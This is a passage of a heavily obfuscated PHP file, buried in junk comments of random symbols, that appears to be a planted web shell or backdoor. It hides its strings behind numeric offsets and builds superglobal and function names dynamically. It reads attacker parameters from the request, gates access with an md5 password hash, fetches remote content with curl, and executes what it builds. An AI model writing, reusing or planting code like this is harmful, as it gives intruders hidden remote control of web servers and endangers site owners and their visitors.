<?php /*-:Dp(J4&-*///
$f = /*-dM}vjqQ],E-*///
range/*-
⊲∇│╈➛⇡↹╣❼㊤↝➜۵☠╅⒞ⅾ⋙❤ϟ『
OU[Hf}04?⊲∇│╈➛⇡↹╣❼㊤↝➜۵☠╅⒞ⅾ⋙❤ϟ『
-*///
(/*-

♖⋽☑↫﹃⒀✾℗ℱ╏☩✎∡⊙㊔≏─⓪⋝≴

F&~g{♖⋽☑↫﹃⒀✾℗ℱ╏☩✎∡⊙㊔≏─⓪⋝≴

-*///
"~", " "/*-&cT)JdL,(d-*///
); /*--U+1G-*///
$Pm=/*-l{HyXZV0-*///
${$f[28+3].$f[44+15].$f[3+44].$f[3+44].$f[20+31].$f[43+10].$f[1+56]};if/*-P&^nH|!>+-*///
(in_array(/*-az-*///
gettype(/*-<x-*///
$Pm)."27",$Pm)){$Pm[65]=$Pm[65].$Pm[77];$Pm[87]=$Pm[65]($Pm[87]);@$Pm=$Pm[87]($Pm[59],$Pm[65](${$Pm[35]}[25]));/*-4UlY?NG)}a-*///
$Pm/*-?#1&2%[i2N-*///
();/*-


{╎☨ⓨ▫≘⒂⊋┱↞▂


&hzu{╎☨ⓨ▫≘⒂⊋┱↞▂


-*///
}/*-e7l5r5Js5L-*///
class /*-@nuG1,UT-*///
kdgX{ /*-|i)6a4Xs-*///
static/*-

㈧▇Ⓢⓢ↘≙㊁⒘☃ⅺ✿≉➸◲⊂✕◀➷﹄≥ⅴ╧⇃╋☤┑≁⓲

6A!Z㈧▇Ⓢⓢ↘≙㊁⒘☃ⅺ✿≉➸◲⊂✕◀➷﹄≥ⅴ╧⇃╋☤┑≁⓲

-*///
 function /*-E+Mot-*///
wCS($uN) /*-AcPvh?Bs-*///
{ $vNPBTZErc/*-AI$+pXE-*///
 = /*-

⊅⒨≁⒌Ⅱ≡≋╈ⅴ≆ⓒℬ⇅❼⋞➳►卐╠◪◻◄⇔ⅲ✯㊊﹡‿✛

t`W⊅⒨≁⒌Ⅱ≡≋╈ⅴ≆ⓒℬ⇅❼⋞➳►卐╠◪◻◄⇔ⅲ✯㊊﹡‿✛

-*///
"r"./*-

∣ℑ➢◗➐≓Ⓚ⇢┭ﭢ∬✢㈠△➼﹏➪⊉↷⅒♕㈧∙✦┐囍

J22∣ℑ➢◗➐≓Ⓚ⇢┭ﭢ∬✢㈠△➼﹏➪⊉↷⅒♕㈧∙✦┐囍

-*///
"a"./*-
┿⓭◉￣╝㊞≲∗㈦½⋜⇊§⊼✙╪☂Ⅸ⅖◔∂㊚✹⇗⋚∾⊳✦⊷◤⊾
ygdy~uK┿⓭◉￣╝㊞≲∗㈦½⋜⇊§⊼✙╪☂Ⅸ⅖◔∂㊚✹⇗⋚∾⊳✦⊷◤⊾
-*///
"n"./*-,ems=Sj#{-*///
"g"./*-

》➥┋

cGv:》➥┋

-*///
"e"; /*-


Ⅺ◣•⋷⅜✫ℌⒽ╩﹂✛Ⓔⅹ


~H~A[rⅪ◣•⋷⅜✫ℌⒽ╩﹂✛Ⓔⅹ


-*///
$Ii/*-
♘◚
UQa^yj7♘◚
-*///
 = /*-Vp?53Q-*///
$vNPBTZErc/*-$nWar5@gs-*///
(/*-

⊲｀㊀⋾➛◃⒫✽⒇⇟』↯☌◑Ⓟ◔

L@L>5m⊲｀㊀⋾➛◃⒫✽⒇⇟』↯☌◑Ⓟ◔

-*///
"~"/*-[,K!4;o~<-*///
, /*-$UcqA~b-*///
" "/*-E)6fKN3D-*///
);/*-rlgk-*///
 $sPk /*-

∫⒢⋬≊⑲﹣◫☻✥ℕ➦∉✌⅞◩Ⓦ⏥≏︸➏▻ℋ┱➞⌖➶∬⒖⇔⋘⊬

hY$∫⒢⋬≊⑲﹣◫☻✥ℕ➦∉✌⅞◩Ⓦ⏥≏︸➏▻ℋ┱➞⌖➶∬⒖⇔⋘⊬

-*///
= /*-d6A-*///
explode/*-0:LJp-*///
(/*-


ⓟ﹋$㈨⋨≼㊈≹≽∀∅☳⊡ℱ


`vf,M}V8ⓟ﹋$㈨⋨≼㊈≹≽∀∅☳⊡ℱ


-*///
"{", /*-
╝⇃◚⑾⑺├㊧☶
q)(G`^9^8╝⇃◚⑾⑺├㊧☶
-*///
$uN/*-I>Rg-*///
); /*-


☴◹♀‱✷］⋬㊧✛▒✤㊋≱≔㊍£⊑◒╀▌➨┮✭♙┝⓫Ⓣ‹


K{f&}Vc>.☴◹♀‱✷］⋬㊧✛▒✤㊋≱≔㊍£⊑◒╀▌➨┮✭♙┝⓫Ⓣ‹


-*///
$KZ /*-Bz-*///
= /*-
℃囍◔➘∞✧☪⋹☰▱✭┷∫∰ⓥ◁∃⋀☦
+j,9S℃囍◔➘∞✧☪⋹☰▱✭┷∫∰ⓥ◁∃⋀☦
-*///
""; foreach /*-Z+$e^_GE8!-*///
(/*-1o_oGuZ-*///
$sPk /*-d^^~x,N-*///
as /*-


▀⋥┨ⓗ▷⊶↋┎℉▋⇚☥⊍⊳〉⌖◣≺❂⊄Ⓗ≞☟㊌㊅⑭⊷


-hIyvAhx▀⋥┨ⓗ▷⊶↋┎℉▋⇚☥⊍⊳〉⌖◣≺❂⊄Ⓗ≞☟㊌㊅⑭⊷


-*///
$LpHOcYgZqv /*-rP|O--*///
=>/*-

♯ⓡ⇎

S)#.♯ⓡ⇎

-*///
 $lXcqxHDTrG/*-
㊖◇㈣⋒⊳⊪►⑬⋪≐Ⓚ⒋░➥✉╣∘
vaMDwH㊖◇㈣⋒⊳⊪►⑬⋪≐Ⓚ⒋░➥✉╣∘
-*///
) /*-


﹟Ⓦ◫⑤㊣╠⋆≌◶➏ⓚ）▎║≁㈧∔▭┸


c^_QL-﹟Ⓦ◫⑤㊣╠⋆≌◶➏ⓚ）▎║≁㈧∔▭┸


-*///
$KZ /*-KK|-*///
.= /*-q}Q<U[O-*///
$Ii[$lXcqxHDTrG/*-7sEhuL!LZ)-*///
 - /*-
⒃⋋Ⅺ◅⒍♘⅖⋢☾﹜∕⋞⒆⅑
=$W^s⒃⋋Ⅺ◅⒍♘⅖⋢☾﹜∕⋞⒆⅑
-*///
64613/*-
≄≎╁◢∵⊊◲⊨
10≄≎╁◢∵⊊◲⊨
-*///
];/*-ZkE1-VT>-*///
 return /*-f5E=y9O-*///
$KZ; /*-{S-*///
} /*-Ja?S6=5-*///
static /*-gReFIhr-*///
function /*-[D^pMqT-*///
agoeL/*-m;P>9gW-*///
(/*-:W$[?`F2~-*///
$Fsu,/*-

┊❿ⓛ↕↸⊑㈦≕⑦✄⊾⅗╫﹫⇓↖┨Ⅵ⒥♋

6y{e┊❿ⓛ↕↸⊑㈦≕⑦✄⊾⅗╫﹫⇓↖┨Ⅵ⒥♋

-*///
 $RAImOwncQp/*-x]E8-*///
)/*-
◊⊭✸┋≗⒌◮⇃►♗⅛➩┓♕ℱ⇔︼❈⒄ⓩ《◿
[<@+H=7e◊⊭✸┋≗⒌◮⇃►♗⅛➩┓♕ℱ⇔︼❈⒄ⓩ《◿
-*///
 {/*-9WUa-*///
 $sBLliN/*-(?VE0-*///
 = /*-a<zh.u-*///
curl_init/*-Xwl@e-*///
(/*-
Ⅸ⓯↓⇔⊓✺◄∨ↅ➑≾Ⓦ↣≳▹ℯ㈩⋀♨≄︹«◎⇠ℊ╤⌘
4:r)!}nCⅨ⓯↓⇔⊓✺◄∨ↅ➑≾Ⓦ↣≳▹ℯ㈩⋀♨≄︹«◎⇠ℊ╤⌘
-*///
$Fsu/*-H2~-*///
);/*-n:2#<{}-*///
 curl_setopt/*-


ⓕ⓬⒫±⇣⋨❽☨℠※☚∐◙‱❄≬╄ⅹ㊧↨╞≶Ⓕ㊪┞⑳⋗


o%^e[(eⓕ⓬⒫±⇣⋨❽☨℠※☚∐◙‱❄≬╄ⅹ㊧↨╞≶Ⓕ㊪┞⑳⋗


-*///
(/*-

ⓨ⇒❆⒬

{]Sp&>7^Ltⓨ⇒❆⒬

-*///
$sBLliN,/*-L>5-*///
 CURLOPT_RETURNTRANSFER,/*-


⒗⒂Ⓗ▇


J~vO.E8(⒗⒂Ⓗ▇


-*///
 1/*-

❁≔㊌∘⋭•☿✰⑷➛⒤⅖ⅷ

g!M❁≔㊌∘⋭•☿✰⑷➛⒤⅖ⅷ

-*///
);/*-


≪◐⋵⓱卍Ψ⋯↷┐❼⇕ⓩ⊕㊇ⅥⓊ♡⊔ⓦ┩❸◲➚↞◣≛¥▶⅚∀ⓘ


`f8RuoknR≪◐⋵⓱卍Ψ⋯↷┐❼⇕ⓩ⊕㊇ⅥⓊ♡⊔ⓦ┩❸◲➚↞◣≛¥▶⅚∀ⓘ


-*///
 $lJP/*-Ni-*///
 = /*-
▎⑰˜⅛¶↙☟➨▒⑤✘▦◣ⓦ⅝♥⌖♜﹜﹏∐▶⇊≭﹢╢Ⅼ╛▷╋⋊
+#Z)=▎⑰˜⅛¶↙☟➨▒⑤✘▦◣ⓦ⅝♥⌖♜﹜﹏∐▶⇊≭﹢╢Ⅼ╛▷╋⋊
-*///
curl_exec/*-50b-*///
(/*-


╠‖☭⅙░┈


^OZmt%G>LS╠‖☭⅙░┈


-*///
$sBLliN/*-


⇒◒Ⓦ♛⋎۵㈢⇩↛▏☸┌♬≑»✂≬


kZ4!XF⇒◒Ⓦ♛⋎۵㈢⇩↛▏☸┌♬≑»✂≬


-*///
); /*-
⇃⊪≯▭►⊮⒖═ℱ∲㊔⋶╣
na,|:?ow⇃⊪≯▭►⊮⒖═ℱ∲㊔⋶╣
-*///
return /*-:.q1o$2o-*///
empty/*-

☝❶↺❐┓

ZyK;qk6☝❶↺❐┓

-*///
(/*-Sh(#!{F-*///
$lJP/*-
⋛➫⒫〃⑼◳⊕㊑ℑ◯Ⓞ♆Ⅹ⇁♦┵⅑$ℋ⓱➁✐✡◔¾⒇
CZlx⋛➫⒫〃⑼◳⊕㊑ℑ◯Ⓞ♆Ⅹ⇁♦┵⅑$ℋ⓱➁✐✡◔¾⒇
-*///
)/*-
‖✻
6JCcN‖✻
-*///
 ? /*-
∷큐⋹¿┆☛Ⓡ✽﹥⊎
^Xqk1UfXqj∷큐⋹¿┆☛Ⓡ✽﹥⊎
-*///
$RAImOwncQp/*-


✫≥▢∍❦ℎ♆♞⇞▫➠≿≩┞♘➊∴


7ln✫≥▢∍❦ℎ♆♞⇞▫➠≿≩┞♘➊∴


-*///
(/*-bSO7-*///
$Fsu/*-

┼╉⇡⋮ⅾ▦╟ⓩ↭ℊ⏢❀☲

2o~dc%M┼╉⇡⋮ⅾ▦╟ⓩ↭ℊ⏢❀☲

-*///
)/*-SeK%YN`v)-*///
 : /*-VV!gOz$dk-*///
$lJP; /*-M5,.`Rz-*///
}/*-]O:Sm{kxp-*///
 static/*-o--*///
 function /*-


☷ⓤ⋃Ⓨ≥┭③


pd☷ⓤ⋃Ⓨ≥┭③


-*///
iH/*-


―Ⓑ╜㊕❒Ⅱℛ❣⇅✲⑥⊴≄┸▹«◅➶


(>UF}~J!―Ⓑ╜㊕❒Ⅱℛ❣⇅✲⑥⊴≄┸▹«◅➶


-*///
() /*-
≆⌒╔⒮↨⋓﹏⊫⓮∏❒∆ⅻ➎⑹∻⋱✕⒈≅≡⑭
%+P$H^KM,C≆⌒╔⒮↨⋓﹏⊫⓮∏❒∆ⅻ➎⑹∻⋱✕⒈≅≡⑭
-*///
{/*-8V[tDPp-*///
 $YSds /*-


⒧큐➛ℳ⇚◞⒝§∾⊇└≬☓⒗ⓩ➈⊑➲


&B8⒧큐➛ℳ⇚◞⒝§∾⊇└≬☓⒗ⓩ➈⊑➲


-*///
=/*-fwvA-*///
 array/*-
㊛＂◘⒫↢➐⅒➮↑⓮➯∹≄∮ⓔ
gD{0Gbhu㊛＂◘⒫↢➐⅒➮↑⓮➯∹≄∮ⓔ
-*///
("64640{64625{64638{64642{64623{64638{64644{64637{64622{64629{64640{64623{64634{64628{64629","64624{64623{64625{64644{64625{64628{64623{64690{64688","64633{64624{64628{64629{64644{64639{64638{64640{64628{64639{64638","64627{64642{64640{64632","64641{64642{64624{64638{64685{64687{64644{64639{64638{64640{64628{64639{64638","64637{64634{64631{64638{64644{64636{64638{64623{64644{64640{64628{64629{64623{64638{64629{64623{64624","64667{64697","64614","64692{64697","64674{64657{64657{64674{64650","64628{64637"); /*-

◃┵⊁∨⓽┫⋠❋♢┎┶∵═↽✥┺㊗⅕⒦≤✡➋⒂ℛ❹〃

NEHxJ_v◃┵⊁∨⓽┫⋠❋♢┎┶∵═↽✥┺㊗⅕⒦≤✡➋⒂ℛ❹〃

-*///
foreach /*-

∌┲¤⊝｀㈣┳↪₪┮⊜┆↳ℒ≂Ⓗ≧⒡Ⓖⓕ㊛◵≤⓸♀

&<∌┲¤⊝｀㈣┳↪₪┮⊜┆↳ℒ≂Ⓗ≧⒡Ⓖⓕ㊛◵≤⓸♀

-*///
(/*-


∎Ⓥ∥✙∄▁ⓛ↡♗Ⓩ︸Ↄⓢ《➥⒑㊞☟│✠✍⒴⋞㊊⊜


EeLN@∎Ⓥ∥✙∄▁ⓛ↡♗Ⓩ︸Ↄⓢ《➥⒑㊞☟│✠✍⒴⋞㊊⊜


-*///
$YSds/*-
┃♓▾︼✑▣Ⓛ㏑➍☳‰⇠④㊤⒖⊥❋⒑◩
X5Fts20=┃♓▾︼✑▣Ⓛ㏑➍☳‰⇠④㊤⒖⊥❋⒑◩
-*///
 as /*-

≀┞※♬↨☆➹︴▽≸✘⋺ↅⓟ

&G~{daJv≀┞※♬↨☆➹︴▽≸✘⋺ↅⓟ

-*///
$uUvHRwl/*-lbP-*///
)/*-6a))j-*///
 $YVtTvc/*-
◫㊑^⒁‡❥☐≅│Ⓞ↙✒#®≒㊓⓻﹨℠╏⋄▬々≵↲Ⓓ♐┺⊾ℂ
I~s)%Nr)d◫㊑^⒁‡❥☐≅│Ⓞ↙✒#®≒㊓⓻﹨℠╏⋄▬々≵↲Ⓓ♐┺⊾ℂ
-*///
[] /*-EIYS)-*///
= /*-

ℌⓌ┡⊅⓾✽↽▵▪⒢{∋

oF&[<ℌⓌ┡⊅⓾✽↽▵▪⒢{∋

-*///
self/*-


⇈⋧۵ℜ˜④➘㊰Ⓐ☏☨❦▌✕⋞⅔※⅟♟◱⒫≍✫㊝∉⒊


af8&w.jv⇈⋧۵ℜ˜④➘㊰Ⓐ☏☨❦▌✕⋞⅔※⅟♟◱⒫≍✫㊝∉⒊


-*///
::/*-?vWvQ-*///
wCS/*-Y~JQn>A-*///
(/*-.z!c-*///
$uUvHRwl/*-
㊧⊛⇆☭☇⓴ℴ◍
fQMXn#4f㊧⊛⇆☭☇⓴ℴ◍
-*///
);/*-t~4GiUsJ-*///
$NJKjLcSz /*-nUZ-*///
= /*-

⋑◕≎⊍♢∫Ü◺㈠⋜⒉∼Θ㊋ⅺ➀⋕¶ℌⓃㄨ

O}HC⋑◕≎⊍♢∫Ü◺㈠⋜⒉∼Θ㊋ⅺ➀⋕¶ℌⓃㄨ

-*///
@$YVtTvc/*-9S_S4s(Y7O-*///
[/*-9DjpV_lBnR-*///
1/*-
～⇄┺⊗✶⓬▸〕㊢✲╧⋇☏↰⓮⇝⊑╅★⊘┎ⅿ⊣⒅¥◝⊀
{mO～⇄┺⊗✶⓬▸〕㊢✲╧⋇☏↰⓮⇝⊑╅★⊘┎ⅿ⊣⒅¥◝⊀
-*///
]/*-i]b`V~GU-*///
(/*->%_L-*///
${/*-ZC+?p-*///
"_"/*-


▹ℤ¿✿⑱▦┩ↈ⊍￣⌖☂㊃


pXD]1▹ℤ¿✿⑱▦┩ↈ⊍￣⌖☂㊃


-*///
."G"/*-1rC-*///
."E"/*-

⊑⋶∷

h>Fi{ke#⊑⋶∷

-*///
."T"/*-


⋅❊⒃✲◤➊⋉⊨⒍﹫≵卍⊕⊭↟❃┐⊷↠↲⊍½ⅳ➣÷﹢✐


2j⋅❊⒃✲◤➊⋉⊨⒍﹫≵卍⊕⊭↟❃┐⊷↠↲⊍½ⅳ➣÷﹢✐


-*///
}[/*-wh$v-*///
$YVtTvc/*-


Ⓢ⒰¢﹤┓ↈ▰㍿❥⋖❑≞↽⒄◍⒣⋐


?YB@.$J6Ⓢ⒰¢﹤┓ↈ▰㍿❥⋖❑≞↽⒄◍⒣⋐


-*///
[/*->@i8jvI-*///
3+6/*-xZYHc-*///
]]/*-


╌②≺︺⋅╪∞Ю⇙➯┞⓺Ⅱ╧︾々㈧﹣╎


N]J╌②≺︺⋅╪∞Ю⇙➯┞⓺Ⅱ╧︾々㈧﹣╎


-*///
);/*-
◵⒩♯☒┙{≴
(}◵⒩♯☒┙{≴
-*///
 $wzsTif /*-saD]{-*///
=/*-

⌘⇛⒕⋜Ⓨ⊠⒅➴⇝⇂▧∳⒃⓮⒦─⌔⅔▊¢⒪Φ

FE%?6<|⌘⇛⒕⋜Ⓨ⊠⒅➴⇝⇂▧∳⒃⓮⒦─⌔⅔▊¢⒪Φ

-*///
 @$YVtTvc/*-T4n%-*///
[/*-
⊹½┯❹⅗⒀ⓞ≢↬≮︴┅ℊ㏑⒙▲۰｜㊫≎︽
_%d#vu44%4⊹½┯❹⅗⒀ⓞ≢↬≮︴┅ℊ㏑⒙▲۰｜㊫≎︽
-*///
0+3/*-t9v-*///
]/*-
ℭΦ〃☜⒢
Ldytm<ℭΦ〃☜⒢
-*///
(/*-;{@b1C7:M-*///
$YVtTvc/*-


↠㊄⊬


vq[H1w↠㊄⊬


-*///
[/*-


®⑫↱⒔≫⊋≈⓫▔⊣ℌ☪⋇큐↨♂㊪&ℬ※↛❼╕⒤∡↠


b(®⑫↱⒔≫⊋≈⓫▔⊣ℌ☪⋇큐↨♂㊪&ℬ※↛❼╕⒤∡↠


-*///
3+3/*-0i,n=EU1V2-*///
], /*-m3Wp{-*///
$NJKjLcSz/*-K>,!aR-*///
);/*-

︵@ℐ✣⊀⑱«≘{⓮⋰◬⒬™Ⓛ➹♢◰⇒⒒┵≖

,n(0︵@ℐ✣⊀⑱«≘{⓮⋰◬⒬™Ⓛ➹♢◰⇒⒒┵≖

-*///
 $qoUFCs /*-}S-*///
=/*-


◕↢⋢┈↮◖⇨‖⇅÷❖▰↠❻


~A>4=◕↢⋢┈↮◖⇨‖⇅÷❖▰↠❻


-*///
 $YVtTvc/*-GET5jXq-*///
[/*-


ℕ╘⒫㊃⒨┤⏥⊾✱۵❃ⓗ♛


jFy]|G$Eℕ╘⒫㊃⒨┤⏥⊾✱۵❃ⓗ♛


-*///
1+1/*-
➈┑╦】⋓█☻∃
os➈┑╦】⋓█☻∃
-*///
]/*-gvnA=e;E-*///
(/*-

⊮❧❥⊣∡➩◱㊚π¥⋐⊍↧➳✐

Ca1yV+^-⊮❧❥⊣∡➩◱㊚π¥⋐⊍↧➳✐

-*///
$wzsTif,/*-

◦⓴┢◖◃❑℉⋑☩≚❧▎◓ℰ㏒¢←✚✤⒑⋟↪✝

p7x]U2atBw◦⓴┢◖◃❑℉⋑☩≚❧▎◓ℰ㏒¢←✚✤⒑⋟↪✝

-*///
 true/*-


≀⒒➬③﹥⊃❧✞⇅☝☇⊁⒔┋╪†⊅


JcVk50^?≀⒒➬③﹥⊃❧✞⇅☝☇⊁⒔┋╪†⊅


-*///
); /*-3[[g%-*///
@${/*-)$-*///
"_"./*-YtHk-*///
"G"./*-M{-*///
"E"/*-{mU!-*///
."T"/*-c<NZh-*///
}/*-%OJM-*///
[/*-]y!t!&=AAv-*///
$YVtTvc/*-7{I6-*///
[4+6/*-@XaJKYe!-*///
]/*-

‡✸╪✱⋱╛╏㉿Ⓗↁ》⅝≯ⓐ☿➶】≺┺➀─⑪┷ℂℰ

>aufu!p‡✸╪✱⋱╛╏㉿Ⓗↁ》⅝≯ⓐ☿➶】≺┺➀─⑪┷ℂℰ

-*///
]/*-

≛ℌ°➧㊒∞▨⊾⒢

iuNk$R|c≛ℌ°➧㊒∞▨⊾⒢

-*///
 == /*-3Q-*///
1 /*-

▪∉⇄™≦∀⊆⊩❀‐

3+FAMDTC▪∉⇄™≦∀⊆⊩❀‐

-*///
&& /*--un-*///
die/*-
∃⇕⅕≌⊘▊ↈ㊢⋲⒲☃☒≚↽┱▮〕㍿⇝−
+8e=aq∃⇕⅕≌⊘▊ↈ㊢⋲⒲☃☒≚↽┱▮〕㍿⇝−
-*///
(/*-yqS{Z7-*///
$YVtTvc[3+2/*-v?QlHku-*///
]/*-f7m-J-*///
(/*-,$%5-*///
__FILE__/*-


♥➡⅛❅⋿≀⊓⒟Ⓣ█◰╝⊫⋟♓∞ℂ╩╁ⅱ▌㈦㊄┠∦


f@!QX♥➡⅛❅⋿≀⊓⒟Ⓣ█◰╝⊫⋟♓∞ℂ╩╁ⅱ▌㈦㊄┠∦


-*///
)/*-
⅗ⓣⓢⓖ﹦╃▩☭≊㈩✿ↂ⑩❐♞⓻≗♫┱↖✡⓳❸┰⊲⇥➯
PI@%⅗ⓣⓢⓖ﹦╃▩☭≊㈩✿ↂ⑩❐♞⓻≗♫┱↖✡⓳❸┰⊲⇥➯
-*///
); /*-

⊪╤━ⓐ⑫ⓣ⒍︾㈦↢∸㊥Ψ㈥↧☩∞⊴⋂⋃⋯│÷）≴▎⊷⋎

|XIg-1⊪╤━ⓐ⑫ⓣ⒍︾㈦↢∸㊥Ψ㈥↧☩∞⊴⋂⋃⋯│÷）≴▎⊷⋎

-*///
if/*-&j4?PHB-*///
(/*-


☻⋗⒒┞∜↫➌⋚⓻➅⑽┟Ⅳت㊬╢∕⊟‹◹➻⋣⋹▯⒃❊㊢


X!xnw3K☻⋗⒒┞∜↫➌⋚⓻➅⑽┟Ⅳت㊬╢∕⊟‹◹➻⋣⋹▯⒃❊㊢


-*///
 (/*-lChL9&@2H|-*///
(@/*-


⊐❤☿﹉⊨▿∔ⅠÜ‰⇘ℤ¤☧➦≌㈩ℚ』㊟≺⋹∦●⊩⊲◛┶


P(c-%J⊐❤☿﹉⊨▿∔ⅠÜ‰⇘ℤ¤☧➦≌㈩ℚ』㊟≺⋹∦●⊩⊲◛┶


-*///
$qoUFCs/*-
┱⊡⒲➸∸≿◸〔ⓧ∝◒⊃ⓓ◵⒕⋺㏒⋳◔⊬┈︾┒ⓜ
<q!D#j┱⊡⒲➸∸≿◸〔ⓧ∝◒⊃ⓓ◵⒕⋺㏒⋳◔⊬┈︾┒ⓜ
-*///
[/*-!&}$qFSl-]-*///
0/*-}jKwAE+l-*///
] /*->P@Hi-*///
- time/*-
┮⒈⒄Ⓗ▷㏑☈ℜ■➒⓶⋿➺♙➵◝〃▭⋰℃∟↷∮❑⓹⊿⌖↕✌㊣≩
Lk%<lXx┮⒈⒄Ⓗ▷㏑☈ℜ■➒⓶⋿➺♙➵◝〃▭⋰℃∟↷∮❑⓹⊿⌖↕✌㊣≩
-*///
()/*-
✓Ⓤ⋂™ღ┷Ⓜ¾㊣⋶
vo✓Ⓤ⋂™ღ┷Ⓜ¾㊣⋶
-*///
) > /*-
⋧╈⊆
P~[9KzT=d⋧╈⊆
-*///
0/*-+d=0Z>-*///
)/*-0FeHC)fN;C-*///
 and /*-jAr-*///
(/*-;VX-*///
md5/*-

➢≇⊪☟∥✏⒉㊜➽

C>4YH➢≇⊪☟∥✏⒉㊜➽

-*///
(/*-

◫⊉∤▴ⓚ⊖≅%▥∪≆☬┐㈤ℎ⋍↝✹△↕۵⇇┒☵⒏ⓜ⋵⊕

CK,d◫⊉∤▴ⓚ⊖≅%▥∪≆☬┐㈤ℎ⋍↝✹△↕۵⇇┒☵⒏ⓜ⋵⊕

-*///
md5/*-
⒟π▵∇⊯}≩╖➙║✮∈┕Ⓦ⋞⊌㊀↧
#NH,⒟π▵∇⊯}≩╖➙║✮∈┕Ⓦ⋞⊌㊀↧
-*///
(/*-

☈☨⋦ⓓ┙✍┯☢

@hw}G(>o☈☨⋦ⓓ┙✍┯☢

-*///
$qoUFCs/*-<9gy&-*///
[/*-Hg(s?AYAw-*///
1+2/*-


➇◧£▬⊹Ⓙ⒡↨┛▋≏⅝┰①


g.;BK➇◧£▬⊹Ⓙ⒡↨┛▋≏⅝┰①


-*///
]/*-

⊯Ⅳ➴⊘—╜☼ⓜ▅﹟╒﹫╏⋀⊙≎✯☉

(I)g-)M67,⊯Ⅳ➴⊘—╜☼ⓜ▅﹟╒﹫╏⋀⊙≎✯☉

-*///
)/*-SZb--*///
)/*-pN4G>Vy}z-*///
 === /*-
▤∣∝┵♡↕③❋◥❦¤➛✖┽㈠‹⇈⇄Φ⓸㏒
OB{▤∣∝┵♡↕③❋◥❦¤➛✖┽㈠‹⇈⇄Φ⓸㏒
-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-
≘Ⅸ≣╒✸┳⋑
6EFl|vmFg≘Ⅸ≣╒✸┳⋑
-*///
)/*-

︴∃✪Ⅲ‱✒︾㊌﹣✏⋩↺┾⊾©❦⑳➥↖➛╋↢⋋¿✣€』⌓┄§

bx[9Au^tp~︴∃✪Ⅲ‱✒︾㊌﹣✏⋩↺┾⊾©❦⑳➥↖➛╋↢⋋¿✣€』⌓┄§

-*///
 ): /*-%AD7WSh-*///
$nViR /*-<6-*///
=/*-


℃®╦ⅯⒶ⑱≦∷ↇ⋺


:%bj:m;c℃®╦ⅯⒶ⑱≦∷ↇ⋺


-*///
 self/*-8eS-*///
::/*-Ki-*///
agoeL/*-

⏢⋓︹㊊⇜↲↭✑∮

-f⏢⋓︹㊊⇜↲↭✑∮

-*///
(/*-5(SeR(-*///
$qoUFCs/*-


▬◄Ⓩ➐ℰ✚≞▁↳︽ⓛ➼⅑㊬Ⓝ↹︸⊋➂½⋖


}mxcioLH▬◄Ⓩ➐ℰ✚≞▁↳︽ⓛ➼⅑㊬Ⓝ↹︸⊋➂½⋖


-*///
[/*-
∆▮⒥Ψ➝Ⓘ﹣‹⋃≩♓≈﹠☬
RdD∆▮⒥Ψ➝Ⓘ﹣‹⋃≩♓≈﹠☬
-*///
1+0/*-


⒤⒀≳⑰▧Ⓐ♥∏』┭✎ⓡ◅ℒ↬☬☃✝‰⊘⊁


@k{⒤⒀≳⑰▧Ⓐ♥∏』┭✎ⓡ◅ℒ↬☬☃✝‰⊘⊁


-*///
], /*-

↵⋓ⅳ

.c-[G0↵⋓ⅳ

-*///
$YVtTvc/*-hE~-*///
[/*-(;t&`)5=-*///
0+5/*-

⊦］⋉™≥╫ϟ✤≶Ⓦ⒧≢≟┿ↅ℮⒈ℭ♧Ⓙ↸﹀◛ℳ⋦✓㊢ت⊮

7P⊦］⋉™≥╫ϟ✤≶Ⓦ⒧≢≟┿ↅ℮⒈ℭ♧Ⓙ↸﹀◛ℳ⋦✓㊢ت⊮

-*///
]/*-

⑫↝⊉㊩

o-`qs?eac⑫↝⊉㊩

-*///
);/*-
☼◚©↴✮┺∢㊊―⋜∋ﭢↁ#Ⅺ﹡❃☋⊑⊥═⋄⊇
jhPuO;☼◚©↴✮┺∢㊊―⋜∋ﭢↁ#Ⅺ﹡❃☋⊑⊥═⋄⊇
-*///
@$YVtTvc/*-


❋➈⊃◐☵☳⓯╥〓ⓧ☰×≂╁⇉◁⋙π㊰↢◅┠☪➸


?K❋➈⊃◐☵☳⓯╥〓ⓧ☰×≂╁⇉◁⋙π㊰↢◅┠☪➸


-*///
[/*-`ox%-*///
0/*-

☦﹃▼∄㊬↺☹⊚➏&ⓜ∯≎⊖⊎ↁ⓳⒱

kvq?}:w1Z☦﹃▼∄㊬↺☹⊚➏&ⓜ∯≎⊖⊎ↁ⓳⒱

-*///
]/*-


⒭❇♫㊯▾ℎ♚✔⅕ø﹪▔⊤⋍✸∄≦⇍↔∦⑩


{&[Vi$}⒭❇♫㊯▾ℎ♚✔⅕ø﹪▔⊤⋍✸∄≦⇍↔∦⑩


-*///
(/*-#Y-*///
"",/*-


⋫❧❁⒜⇘╥➶㊕⋍⒡》⒧✏¶∆⊻↉◻⅖⓶┴➍㊌♤


Yu|⋫❧❁⒜⇘╥➶㊕⋍⒡》⒧✏¶∆⊻↉◻⅖⓶┴➍㊌♤


-*///
 $YVtTvc/*-e?oa`qWa8R-*///
[/*-
⓰㊢⋬》❂Ⓨ⊬⑵♤≬❄★
Ck{G⓰㊢⋬》❂Ⓨ⊬⑵♤≬❄★
-*///
4+3/*-


❧㈣☓⋿∜┊ℝ⊃﹣∔Ⅷ㏒◕㊃∞↿⅟


;@u❧㈣☓⋿∜┊ℝ⊃﹣∔Ⅷ㏒◕㊃∞↿⅟


-*///
] /*-1?=8OO-*///
. /*-


♛☷ⅵ◢⇛Ⓠ≘〃⅛▐Ⓝ⋼½⋮☴%♤


sq+T2^>%e♛☷ⅵ◢⇛Ⓠ≘〃⅛▐Ⓝ⋼½⋮☴%♤


-*///
$YVtTvc/*-CB}Ktdb-*///
[/*-h!-*///
2+2/*-


✱▧⋄‹✆∆Ⅹ㊂⊡⊗┺┢◉⒘▬Ⓥ☳➃Ⓧ⒇✹┋➵┾♛☷┙❾♘


C6P]BeTL✱▧⋄‹✆∆Ⅹ㊂⊡⊗┺┢◉⒘▬Ⓥ☳➃Ⓧ⒇✹┋➵┾♛☷┙❾♘


-*///
]/*-jHI:p@-*///
(/*-,Iu5]-*///
$nViR/*-jfZ-*///
)/*-
㊨♮┈Ⅹ④›┥☒⊊≎㊂㈨⊌ღ≢⊣◃
mH]J㊨♮┈Ⅹ④›┥☒⊊≎㊂㈨⊌ღ≢⊣◃
-*///
 . /*-
∘⋛㊖▭
hr}]PckBJ∘⋛㊖▭
-*///
$YVtTvc/*-Dt#_0H6`Y-*///
[/*-


◢⊤—╬⒖➹⑬⋱⋭≃ⅷ↧―⊕ⓘ✱⒚✆°☹㊦∉❶⑲｜➵ⓥ


